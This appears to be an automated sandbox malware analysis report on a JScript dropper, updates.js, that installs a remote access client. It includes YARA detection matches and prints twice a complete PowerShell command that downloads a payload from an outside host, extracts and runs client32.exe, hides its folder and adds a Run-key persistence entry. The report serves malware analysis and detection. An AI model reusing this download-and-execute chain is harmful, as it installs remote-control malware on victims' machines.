                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 111744C6 appears 40 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 11147AD0 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 11081E70 appears 81 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 1109DCE0 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 11029A70 appears 1714 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 1116FED0 appears 69 times
                                Source: updates.jsInitial sample: Strings found which are bigger than 50
                                Source: updates.js, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: wscript.exe PID: 7336, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winJS@8/28@3/3
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1105A760 GetLastError,FormatMessageA,LocalFree,3_2_1105A760
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,3_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1109D8F0 AdjustTokenPrivileges,FindCloseChangeNotification,3_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,7_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,7_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,3_2_11116880
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11089430 FindResourceA,LoadResource,LockResource,3_2_11089430
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,7_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olj24nsh.di3.ps1Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\GRDCWLLI20\NSM.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: updates.jsStatic file information: File size 7688860 > 1048576
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BADE4000.00000004.00000800.00020000.00000000.sdmp, client32.exe
